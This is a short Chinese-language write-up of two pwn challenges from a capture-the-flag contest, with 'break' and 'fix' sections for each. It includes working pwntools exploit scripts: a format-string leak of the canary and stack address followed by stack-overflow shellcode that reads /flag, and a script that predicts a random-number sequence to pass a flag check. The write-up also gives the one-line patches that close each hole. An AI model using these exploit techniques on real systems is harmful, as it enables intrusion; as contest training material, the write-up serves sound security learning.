pwn1

• break

很简单，栈可执行。
先格式化字符串泄露出栈地址和canary，然后稍稍布置一下打orw就行
沙盒和没有一样

from pwn import *context(arch='amd64', os='linux')if __name__ == '__main__':# io = remote('192.47.1.39', 80)io = remote('192.168.142.137', 1234)io.recvuntil(b'2: get name')io.sendline(b'1')io.recvuntil(b'->set name')io.sendline(b'%17$p')io.recvuntil(b'2: get name')io.sendline(b'2')io.recvuntil(b'->get name\n')canary = int(io.recvuntil(b'\n')[:-1], 16)print(hex(canary))shellcode = shellcraft.openat(0, '/flag')shellcode += shellcraft.read('rax', 'rsp', 32)shellcode += shellcraft.write(1, 'rsp', 32)shellcode = asm(shellcode)payload = shellcodepayload = payload.rjust(0x60 - 8 * 3, b'\x90')payload += p64(canary)io.recvuntil(b'2: get name')io.sendline(b'1')io.recvuntil(b'->set name')io.sendline(b'%18$pk')io.recvuntil(b'2: get name')io.sendline(b'2')io.recvuntil(b'->get name\n')target_stack = int(io.recvuntil(b'k')[:-1], 16) - 0x60print(hex(target_stack))payload += p64(0xdeedbeef)payload += p64(target_stack)io.recvuntil(b'2: get name')io.sendline(b'1')io.recvuntil(b'->set name')io.sendline(payload)io.recvuntil(b'2: get name')io.sendline(b'3')# 7FFD0D2025F0 tar# 7FFD0D202650 getprint(payload)print(len(payload))io.interactive()pass# context(log_level='debug', arch='amd64', os='linux')
# if __name__ == '__main__':
#     io = remote('202.0.5.74', 8888)
#     shellcode = shellcraft.open('/flag')
#     shellcode += shellcraft.read('rax', 'rsp', 100)
#     shellcode += shellcraft.write(1, 'rsp', 100)
#     shellcode = asm(shellcode)
#     io.sendlineafter(b'ode?\n\n', shellcode)
#     io.interactive()

• fix

关键点是栈溢出，把read大小从0x80改成0x60即可

pwn2

• break

简单题，难在没有符号表。
只需要看懂逻辑即可。猜flag头稍稍需要一点点运气

from pwn import *context(arch='amd64', os='linux')if __name__ == '__main__':# io = remote('192.47.1.50', 80)io = remote('192.168.142.137', 9999)fuck = []for i in range(4):io.recvuntil(b'check flag\n')io.sendline(b'2')io.recvuntil(b':')fuck.append(str(int(io.recvuntil(b'\n')[:-1], 10)).encode())print(fuck)fuck_flag = 0x5139397b67616c66for i in range(4):fuck_flag = (0x5851F42D4C957F2D * fuck_flag + 12345) & 0x7FFFFFFFFFFFFFFFio.recvuntil(b'check flag\n')io.sendline(b'3')io.recvuntil(b'\n')io.sendline(fuck[i] + b' ' + str(fuck_flag).encode())io.recvuntil(b'check flag\n')io.sendline(b'6')io.interactive()

• fix

把printf吐flag的%s改成ss即可

小结

pwn题目难度整体偏低，而且只有两道题，希望下次可以多一点。